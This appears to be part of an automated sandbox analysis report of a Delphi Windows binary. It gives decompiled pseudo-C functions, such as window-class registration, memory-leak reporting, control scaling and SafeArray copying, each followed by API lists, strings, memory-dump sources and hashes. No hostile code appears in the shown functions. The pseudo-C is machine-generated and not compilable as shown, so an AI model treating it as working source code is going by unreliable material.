            E0040C158(_t94, _v196, 1, _t110, _t112, 0,  &_v192);
            E00404184();
        } else {
            _t109 =  *0x4369e8; // 0x436a34
            if(E00403AB4(_t94, _t109) == 0) {
                goto L6;
            }
            _v116 = E004423F8(_t94);
        }
        goto L7;
    }
}


                                                                            APIs
                                                                            • GetClassInfoA.USER32 ref: 0043EB04
                                                                            • UnregisterClassA.USER32 ref: 0043EB2C
                                                                            • RegisterClassA.USER32 ref: 0043EB42
                                                                            • GetWindowLongA.USER32 ref: 0043EB7E
                                                                            • GetWindowLongA.USER32 ref: 0043EB93
                                                                            • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0043EBA6
                                                                            Strings
                                                                            • h5B , xrefs: 0043EACB
                                                                            • @ , xrefs: 0043EA79
                                                                            • 4jC , xrefs: 0043EA91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                            • String ID: 4jC$@$h5B
                                                                            • API String ID: 717780171-916785525
                                                                            • Opcode ID: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2
                                                                            • Instruction ID: d23709e6df1bb4d3d126ec428beffe84ce2308d2414f8cb5aec67fee482d3fa9
                                                                            • Opcode Fuzzy Hash: 23814c8b448176fa15c958dc6a007fd35c890fe50a8182ec585c7e2c3e7324e2
                                                                            • Instruction Fuzzy Hash: E2518670A013449BDB21EB66CC81B9EB3E8BF48308F00456AF845E73D2DB38AD45CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0040C054(void* __edx, void* __edi, void* __fp0) {
    void _v1024;
    char _v1088;
    long _v1092;
    void* _t12;
    char* _t14;
    intOrPtr _t16;
    intOrPtr _t18;
    intOrPtr _t24;
    long _t32;

    L0040BECC(_t12,  &_v1024, __edx, __fp0, 0x400);
    _t14 =  *0x462e14; // 0x46304c
    if( *_t14 == 0) {
        _t16 =  *0x462b88; // 0x40762c
        _t9 = _t16 + 4; // 0xffec
        _t18 =  *0x4657f8; // 0x400000
        LoadStringA(E00405C64(_t18),  *_t9,  &_v1088, 0x40);
        return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    }
    _t24 =  *0x462bec; // 0x46321c
    E00402E68(E004030B4(_t24));
    CharToOemA( &_v1024,  &_v1024);
    _t32 = E00409008( &_v1024, __edi);
    WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    return WriteFile(GetStdHandle(0xfffffff4), E0040C118, "true",  &_v1092, 0);
}


                                                                            APIs
                                                                              • Part of subcall function 0040BECC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040BEE9
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040BF0D
                                                                              • Part of subcall function 0040BECC: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040BF28
                                                                              • Part of subcall function 0040BECC: LoadStringA.USER32 ref: 0040BFBE
                                                                            • CharToOemA.USER32 ref: 0040C08B
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040C0A8
                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0AE
                                                                            • GetStdHandle.KERNEL32(000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C3
                                                                            • WriteFile.KERNEL32(00000000,000000F4,0040C118,?,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040C0C9
                                                                            • LoadStringA.USER32 ref: 0040C0EB
                                                                            • MessageBoxA.USER32 ref: 0040C101
                                                                            Strings
                                                                            • ,v@ , xrefs: 0040C0D7
                                                                            • L0F , xrefs: 0040C068
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                            • String ID: ,v@$L0F
                                                                            • API String ID: 185507032-114336920
                                                                            • Opcode ID: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e
                                                                            • Instruction ID: 968c3332249ca419ab36ba5ff9e4d5e5c4f2a2f71d5e9e194e9044cb27fed959
                                                                            • Opcode Fuzzy Hash: 07f17ca0095baed20458b404fad0876ad00edfc715b2c3dd6b064ac9ae374d2e
                                                                            • Instruction Fuzzy Hash: F61154B1148204BAD200EB95CC86F8B77EC9B44704F40453BB755FA1D3DAB9E94487AB
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
E0040262A(void* __eax, void* __fp0) {
    void* _v8;
    char _v110600;
    char _v112644;
    char _v112645;
    signed int _v112652;
    char _v112653;
    char _v112654;
    char _v112660;
    intOrPtr _v112664;
    intOrPtr _v112668;
    intOrPtr _v112672;
    struct HWND__* _v112676;
    signed short* _v112680;
    intOrPtr* _v112684;
    char _v129068;
    char _v131117;
    char _v161836;
    void* _v162091;
    signed char _v162092;
    void* _t73;
    int _t79;
    signed int _t126;
    int _t131;
    intOrPtr _t132;
    char* _t134;
    char* _t135;
    char* _t136;
    char* _t137;
    char* _t138;
    char* _t139;
    char* _t141;
    char* _t142;
    char* _t147;
    char* _t148;
    intOrPtr _t179;
    void* _t181;
    void* _t183;
    void* _t184;
    intOrPtr* _t187;
    intOrPtr* _t188;
    signed int _t193;
    void* _t197;
    void* _t199;
    void* _t213;

    _t197 = _t199;
    _push(__eax);
    _t73 = 0x27;
    goto L2;
    L13:
    while(_t179 != 0x463708) {
        _t79 = E00402144(_t179);
        _t131 = _t79;
        __eflags = _t131;
        if(_t131 == 0) {
            L12:
            _t179 =  *((intOrPtr*)(_t179 + 4));
            continue;
        } else {
            goto L5;
        }
        do {
            L5:
            _t193 =  *(_t131 - 4);
            __eflags = _t193 & 0x00000001;
            if((_t193 & 0x00000001) == 0) {
                __eflags = _t193 & 0x00000004;
                if(__eflags == 0) {
                    __eflags = _v112652 - 0x1000;
                    if(_v112652 < 0x1000) {
                        _v112664 = (_t193 & 0xfffffff0) - 4;
                        _t126 = E00402488(_t131, _t164);
                        __eflags = _t126;
                        if(_t126 == 0) {
                            _v112645 = 0;
                            _t164 = _v112664;
                            *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                            _t18 =  &_v112652;
                            *_t18 = _v112652 + 1;
                            __eflags =  *_t18;
                        }
                    }
                } else {
                    E004024E0(_t131, __eflags, _t197);
                }
            }
            _t79 = E00402120(_t131);
            _t131 = _t79;
            __eflags = _t131;
        } while (_t131 != 0);
        goto L12;
    }
    _t132 =  *0x4657b0; // 0x4657ac
    while(_t132 != 0x4657ac && _v112652 < 0x1000) {
        _t79 = E00402488(_t132 + 0x10, _t164);
        __eflags = _t79;
        if(_t79 == 0) {
            _v112645 = 0;
            _t22 = _t132 + 0xc; // 0x0
            _t79 = _v112652;
            *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
            _t27 =  &_v112652;
            *_t27 = _v112652 + 1;
            __eflags =  *_t27;
        }
        _t29 = _t132 + 4; // 0x4657ac
        _t132 =  *_t29;
    }
    if(_v112645 != 0) {
        L49:
        return _t79;
    }
    _v112653 = 0;
    _v112668 = 0;
    _t134 = E004022DC(0x28,  &_v161836);
    _v112660 = 0x37;
    _v112680 = 0x46103e;
    _v112684 =  &_v110600;
    do {
        _v112672 = ( *_v112680 & 0x0000ffff) - 4;
        _v112654 = 0;
        _t181 = 0xff;
        _t187 = _v112684;
        while(_t134 <=  &_v131117) {
            if( *_t187 > 0) {
                if(_v112653 == 0) {
                    _t134 = E004022DC(0x27, _t134);
                    _v112653 = 1;
                }
                if(_v112654 != 0) {
                    *_t134 = 0x2c;
                    _t139 = _t134 + 1;
                    *_t139 = 0x20;
                    _t140 = _t139 + 1;
                    __eflags = _t139 + 1;
                } else {
                    *_t134 = 0xd;
                    *((char*)(_t134 + 1)) = 0xa;
                    _t147 = E004021C0(_v112668 + 1, _t134 + 2);
                    *_t147 = 0x20;
                    _t148 = _t147 + 1;
                    *_t148 = 0x2d;
                    *((char*)(_t148 + 1)) = 0x20;
                    _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2));
                    _v112654 = 1;
                }
                _t213 = _t181 - 1;
                if(_t213 < 0) {
                    _t141 = E004022DC(7, _t140);
                } else {
                    if(_t213 == 0) {
                        _t141 = E004022DC(6, _t140);
                    } else {
                        E00403808( *((intOrPtr*)(_t187 - 4)),  &_v162092);
                        _t141 = E004022DC(_v162092 & 0x000000ff, _t140);
                    }
                }
                *_t141 = 0x20;
                _t142 = _t141 + 1;
                *_t142 = 0x78;
                *((char*)(_t142 + 1)) = 0x20;
                _t134 = E004021C0( *_t187, _t142 + 2);
            }
            _t181 = _t181 - 1;
            _t187 = _t187 - 8;
            if(_t181 != 0xffffffff) {
                continue;
            } else {
                goto L38;
            }
        }
        L38:
        _v112668 = _v112672;
        _v112684 = _v112684 + 0x800;
        _v112680 =  &(_v112680[0x10]);
        _t60 =  &_v112660;
        *_t60 = _v112660 - 1;
    } while ( *_t60 != 0);
    if(_v112652 <= 0) {
        L48:
        E004022DC(3, _t134);
        _t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
        goto L49;
    }
    if(_v112653 != 0) {
        *_t134 = 0xd;
        _t136 = _t134 + 1;
        *_t136 = 0xa;
        _t137 = _t136 + 1;
        *_t137 = 0xd;
        _t138 = _t137 + 1;
        *_t138 = 0xa;
        _t134 = _t138 + 1;
    }
    _t134 = E004022DC(0x3c, _t134);
    _t183 = _v112652 - 1;
    if(_t183 >= 0) {
        _t184 = _t183 + 1;
        _v112676 = 0;
        _t188 =  &_v129068;
        L44:
        L44:
        if(_v112676 != 0) {
            *_t134 = 0x2c;
            _t135 = _t134 + 1;
            *_t135 = 0x20;
            _t134 = _t135 + 1;
        }
        _t134 = E004021C0( *_t188, _t134);
        if(_t134 >  &_v131117) {
            goto L48;
        }
        _v112676 =  &(_v112676->i);
        _t188 = _t188 + 4;
        _t184 = _t184 - 1;
        if(_t184 != 0) {
            goto L44;
        }
    }
    L2:
    _t199 = _t199 + 0xfffff004;
    _push(_t73);
    _t73 = _t73 - 1;
    if(_t73 != 0) {
        goto L2;
    } else {
        E00403264( &_v112644, 0x1b800);
        _t164 = 0x4000;
        E00403264( &_v129068, 0x4000);
        _t79 = 0;
        _v112652 = 0;
        _v112645 = 1;
        _t179 =  *0x46370c; // 0x25e0000
        goto L13;
    }
}

                                                                            0x00402717
                                                                            0x00402756
                                                                            0x00402724
                                                                            0x00402729
                                                                            0x0040272b
                                                                            0x0040272d
                                                                            0x00402734
                                                                            0x00402740
                                                                            0x00402746
                                                                            0x0040274d
                                                                            0x0040274d
                                                                            0x0040274d
                                                                            0x0040274d
                                                                            0x00402753
                                                                            0x00402753
                                                                            0x00402753
                                                                            0x00402771
                                                                            0x004029cf
                                                                            0x004029d5
                                                                            0x004029d5
                                                                            0x00402777
                                                                            0x00402780
                                                                            0x0040279b
                                                                            0x0040279d
                                                                            0x004027a7
                                                                            0x004027b7
                                                                            0x004027bd
                                                                            0x004027c9
                                                                            0x004027cf
                                                                            0x004027d6
                                                                            0x004027e1
                                                                            0x004027e3
                                                                            0x004027f4
                                                                            0x00402801
                                                                            0x00402814
                                                                            0x00402816
                                                                            0x00402816
                                                                            0x00402824
                                                                            0x00402875
                                                                            0x00402878
                                                                            0x00402879
                                                                            0x0040287c
                                                                            0x0040287c
                                                                            0x00402826
                                                                            0x00402826
                                                                            0x0040282a
                                                                            0x0040283c
                                                                            0x0040283e
                                                                            0x00402841
                                                                            0x00402842
                                                                            0x00402846
                                                                            0x0040286a
                                                                            0x0040286c
                                                                            0x0040286c
                                                                            0x0040287f
                                                                            0x00402882
                                                                            0x00402899
                                                                            0x00402884
                                                                            0x00402884
                                                                            0x004028ae
                                                                            0x00402886
                                                                            0x004028bb
                                                                            0x004028d4
                                                                            0x004028d4
                                                                            0x00402884
                                                                            0x004028d6
                                                                            0x004028d9
                                                                            0x004028da
                                                                            0x004028de
                                                                            0x004028eb
                                                                            0x004028eb
                                                                            0x004028ed
                                                                            0x004028ee
                                                                            0x004028f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004028f4
                                                                            0x004028fa
                                                                            0x00402900
                                                                            0x00402906
                                                                            0x00402910
                                                                            0x00402917
                                                                            0x00402917
                                                                            0x00402917
                                                                            0x0040292a
                                                                            0x004029a6
                                                                            0x004029b2
                                                                            0x004029ca
                                                                            0x00000000
                                                                            0x004029ca
                                                                            0x00402933
                                                                            0x00402935
                                                                            0x00402938
                                                                            0x00402939
                                                                            0x0040293c
                                                                            0x0040293d
                                                                            0x00402940
                                                                            0x00402941
                                                                            0x00402944
                                                                            0x00402944
                                                                            0x00402956
                                                                            0x0040295e
                                                                            0x00402961
                                                                            0x00402963
                                                                            0x00402964
                                                                            0x0040296e
                                                                            0x00000000
                                                                            0x00402974
                                                                            0x0040297b
                                                                            0x0040297d
                                                                            0x00402980
                                                                            0x00402981
                                                                            0x00402984
                                                                            0x00402984
                                                                            0x0040298e
                                                                            0x00402998
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040299a
                                                                            0x004029a0
                                                                            0x004029a3
                                                                            0x004029a4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004029a4
                                                                            0x00402635
                                                                            0x00402635
                                                                            0x0040263b
                                                                            0x0040263c
                                                                            0x0040263d
                                                                            0x00000000
                                                                            0x0040263f
                                                                            0x00402658
                                                                            0x00402665
                                                                            0x0040266a
                                                                            0x0040266f
                                                                            0x00402671
                                                                            0x00402677
                                                                            0x0040267e
                                                                            0x00000000
                                                                            0x0040267e

                                                                            Strings
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            • 7 , xrefs: 0040279D
                                                                            • bytes: , xrefs: 00402859
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                            • API String ID: 0-2723507874
                                                                            • Opcode ID: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction ID: 232ad5794996384582659ab8687426251ae0ce960e01d4fcfe06ac857680b770
                                                                            • Opcode Fuzzy Hash: ab1744bc822241615f06664216cff9c599eaab7f23789ca155b362964788a165
                                                                            • Instruction Fuzzy Hash: E771C630B042588FDB21AA2DC988BD9B6E5EB09704F1441FBE049F73C2DBB949C5CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0043A624(intOrPtr* __eax, int __ecx, int __edx) {
                                                                                signed int _t62;
                                                                                signed int _t64;
                                                                                signed int _t65;
                                                                                signed char _t109;
                                                                                int _t121;
                                                                                intOrPtr* _t122;
                                                                                int _t123;
                                                                                int* _t125;

                                                                                *_t125 = __ecx;
                                                                                _t121 = __edx;
                                                                                _t122 = __eax;
                                                                                if(__edx == *_t125) {
                                                                                    L29:
                                                                                    _t62 = *0x43a7e0 & 0x000000ff;
                                                                                    *(_t122 + 0x8c) = _t62;
                                                                                    return _t62;
                                                                                }
                                                                                if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                                    _t109 = *0x43a7d8 & 0x000000ff;
                                                                                } else {
                                                                                    _t109 = *(__eax + 0x8c) & 0x000000ff;
                                                                                }
                                                                                if((_t109 & 0x00000001) == 0) {
                                                                                    _t123 = *(_t122 + 0x40);
                                                                                } else {
                                                                                    _t123 = MulDiv( *(_t122 + 0x40), _t121, *_t125);
                                                                                }
                                                                                if((_t109 & 0x00000002) == 0) {
                                                                                    _t125[1] = *(_t122 + 0x44);
                                                                                } else {
                                                                                    _t125[1] = MulDiv( *(_t122 + 0x44), _t121, *_t125);
                                                                                }
                                                                                if((_t109 & 0x00000004) == 0 || ( *(_t122 + 0x51) & 0x00000001) != 0) {
                                                                                    _t64 = *(_t122 + 0x48);
                                                                                    _t125[2] = _t64;
                                                                                } else {
                                                                                    if((_t109 & 0x00000001) == 0) {
                                                                                        _t64 = MulDiv( *(_t122 + 0x48), _t121, *_t125);
                                                                                        _t125[2] = _t64;
                                                                                    } else {
                                                                                        _t64 = MulDiv( *(_t122 + 0x40) + *(_t122 + 0x48), _t121, *_t125) - _t123;
                                                                                        _t125[2] = _t64;
                                                                                    }
                                                                                }
                                                                                _t65 = _t64 & 0xffffff00 | (_t109 & 0x00000008) != 0x00000000;
                                                                                if(_t65 == 0 || ( *(_t122 + 0x51) & 0x00000002) != 0) {
                                                                                    _t125[3] = *(_t122 + 0x4c);
                                                                                } else {
                                                                                    if(_t65 == 0) {
                                                                                        _t125[3] = MulDiv( *(_t122 + 0x44), _t121, *_t125);
                                                                                    } else {
                                                                                        _t125[3] = MulDiv( *(_t122 + 0x44) + *(_t122 + 0x4c), _t121, *_t125) - _t125[1];
                                                                                    }
                                                                                }
                                                                                E0043A4D8(_t122, *_t125, _t121);
                                                                                *((intOrPtr*)( *_t122 + 0x88))(_t125[4], _t125[2]);
                                                                                if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7dc)) {
                                                                                    *(_t122 + 0x175) = MulDiv( *(_t122 + 0x175), _t121, *_t125);
                                                                                }
                                                                                if(( *0x43a7e0 & 0x000000ff) != (_t109 & *0x43a7e4)) {
                                                                                    *(_t122 + 0x179) = MulDiv( *(_t122 + 0x179), _t121, *_t125);
                                                                                }
                                                                                if( *((char*)(_t122 + 0x59)) == 0 && (_t109 & 0x00000010) != 0) {
                                                                                    E00425C2C( *((intOrPtr*)(_t122 + 0x68)), MulDiv(E00425C10( *((intOrPtr*)(_t122 + 0x68))), _t121, *_t125));
                                                                                }
                                                                                goto L29;
                                                                            }


                                                                            APIs
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A65F
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A679
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6A7
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6BD
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A6F5
                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043A70D
                                                                              • Part of subcall function 00425C10: MulDiv.KERNEL32(00000000,00000048,?), ref: 00425C21
                                                                            • MulDiv.KERNEL32(?), ref: 0043A764
                                                                            • MulDiv.KERNEL32(?), ref: 0043A78E
                                                                            • MulDiv.KERNEL32(00000000), ref: 0043A7B4
                                                                              • Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction ID: 31ea7b08f01d562e4291b2201e28d04268924927301679854e288b517f7f1c2d
                                                                            • Opcode Fuzzy Hash: 2325144a8e082e646bad59a138fd9ea4b37950158a0450446acd531626ff6a80
                                                                            • Instruction Fuzzy Hash: FA513370644750AFC320EB69C885E6BB7F9AF49744F08581EF5D6C7361C739E8608B1A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 39%
                                                                            E0043B5A8(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                char _v5;
                                                                                struct HWND__* _v12;
                                                                                struct HDC__* _v16;
                                                                                void* _v20;
                                                                                intOrPtr _v24;
                                                                                intOrPtr _v28;
                                                                                int _v32;
                                                                                int _v36;
                                                                                int _t76;
                                                                                intOrPtr _t82;
                                                                                int _t85;
                                                                                void* _t90;
                                                                                int _t91;
                                                                                void* _t94;
                                                                                void* _t95;
                                                                                intOrPtr _t96;

                                                                                _t94 = _t95;
                                                                                _t96 = _t95 + 0xffffffe0;
                                                                                _v5 = __ecx;
                                                                                _t76 = *((intOrPtr*)( *__edx + 0x38))();
                                                                                if(_v5 == 0) {
                                                                                    _push(__edx);
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    _pop(_t90);
                                                                                } else {
                                                                                    _push(__edx);
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    asm("movsd");
                                                                                    _pop(_t90);
                                                                                }
                                                                                _v12 = GetDesktopWindow();
                                                                                _v16 = GetDCEx(_v12, 0, 0x402);
                                                                                _push(_t94);
                                                                                _push(0x43b6c3);
                                                                                _push( *[fs:eax]);
                                                                                *[fs:eax] = _t96;
                                                                                _v20 = SelectObject(_v16, E004261BC( *((intOrPtr*)(_t90 + 0x48))));
                                                                                _t91 = _v36;
                                                                                _t85 = _v32;
                                                                                PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
                                                                                PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
                                                                                PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
                                                                                PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
                                                                                SelectObject(_v16, _v20);
                                                                                _pop(_t82);
                                                                                *[fs:eax] = _t82;
                                                                                _push(0x43b6ca);
                                                                                return ReleaseDC(_v12, _v16);
                                                                            }


                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 0043B5DF
                                                                            • GetDCEx.USER32(?,00000000,00000402), ref: 0043B5F2
                                                                            • SelectObject.GDI32(?,00000000), ref: 0043B615
                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B63B
                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B65D
                                                                            • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043B67C
                                                                            • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043B696
                                                                            • SelectObject.GDI32(?,?), ref: 0043B6A3
                                                                            • ReleaseDC.USER32 ref: 0043B6BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ObjectSelect$DesktopReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 1187665388-0
                                                                            • Opcode ID: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e
                                                                            • Instruction ID: 4169a8a6f7cde27594b8dc9ea805dfdf28c36229a5204248b9e0b1c31a3baf9f
                                                                            • Opcode Fuzzy Hash: b2c602b1dc45e199638d733ea000c6a1b9b22f9762cdf267a88b65931b3f431e
                                                                            • Instruction Fuzzy Hash: 6F31FB76A00219BFDB01DEEDCC85EAFBBBCEF09704B414569B504F7281C679AD048BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                                                                                  E0040FAE0(short* __eax, intOrPtr __ecx, signed short* __edx) { 				char _v260; 				char _v768; 				char _v772; 				short* _v776; 				intOrPtr _v780; 				char _v784; 				signed int _v788; 				signed short* _v792; 				char _v796; 				char _v800; 				intOrPtr* _v804; 				void* __ebp; 				signed char _t47; 				signed int _t54; 				void* _t62; 				intOrPtr* _t73; 				signed short* _t91; 				void* _t93; 				void* _t95; 				void* _t98; 				void* _t99; 				intOrPtr* _t108; 				void* _t112; 				intOrPtr _t113; 				char* _t114; 				void* _t115;  				_t100 = __ecx; 				_v780 = __ecx; 				_t91 = __edx; 				_v776 = __eax; 				if(( *(__edx + 1) & 0x00000020) == 0) { 					E0040F688(0x80070057); 				} 				_t47 =  *_t91 & 0x0000ffff; 				if((_t47 & 0x00000fff) != 0xc) { 					_push(_t91); 					_push(_v776); 					L0040E2AC(); 					return E0040F688(_v776); 				} else { 					if((_t47 & 0x00000040) == 0) { 						_v792 = _t91[4]; 					} else { 						_v792 =  *(_t91[4]); 					} 					_v788 =  *_v792 & 0x0000ffff; 					_t93 = _v788 - 1; 					if(_t93 < 0) { 						L9: 						_push( &_v772); 						_t54 = _v788; 						_push(_t54); 						_push(0xc); 						L0040E70C(); 						_t113 = _t54; 						if(_t113 == 0) { 							E0040F3E0(_t100); 						} 						E0040FA38(_v776); 						 *_v776 = 0x200c; 						 *((intOrPtr*)(_v776 + 8)) = _t113; 						_t95 = _v788 - 1; 						if(_t95 < 0) { 							L14: 							_t97 = _v788 - 1; 							if(E0040FA54(_v788 - 1, _t115) != 0) { 								L0040E744(); 								E0040F688(_v792); 								L0040E744(); 								E0040F688( &_v260); 								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796); 							} 							_t62 = E0040FA84(_t97, _t115); 						} else { 							_t98 = _t95 + 1; 							_t73 =  &_v768; 							_t108 =  &_v260; 							do { 								 *_t108 =  *_t73; 								_t108 = _t108 + 4; 								_t73 = _t73 + 8; 								_t98 = _t98 - 1; 							} 
while (_t98 != 0); 							do { 								goto L14; 							} while (_t62 != 0); 							return _t62; 						} 					} else { 						_t99 = _t93 + 1; 						_t112 = 0; 						_t114 =  &_v772; 						do { 							_v804 = _t114; 							_push(_v804 + 4); 							_t18 = _t112 + 1; // 0x1 							_push(_v792); 							L0040E714(); 							E0040F688(_v792); 							_push( &_v784); 							_t21 = _t112 + 1; // 0x1 							_push(_v792); 							L0040E71C(); 							E0040F688(_v792); 							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1; 							_t112 = _t112 + 1; 							_t114 = _t114 + 8; 							_t99 = _t99 - 1; 						} while (_t99 != 0); 						goto L9; 					} 				} 			}                        


                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040FB79
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040FB95
                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040FBCE
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040FC4B
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040FC64
                                                                            • VariantCopy.OLEAUT32(?), ref: 0040FC99
                                                                            Strings
                                                                            • , xrefs: 0040FAFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                            • String ID:
                                                                            • API String ID: 351091851-3916222277
                                                                            • Opcode ID: 1259071905c284c690569f5ebbe38a6ff0448cf178a14f89c988a819c5d5ab72
                                                                            • Instruction ID: e8b17cf1572734a03829fa1d627ab26794180486a0a47edda1f815aa89ecf2ba
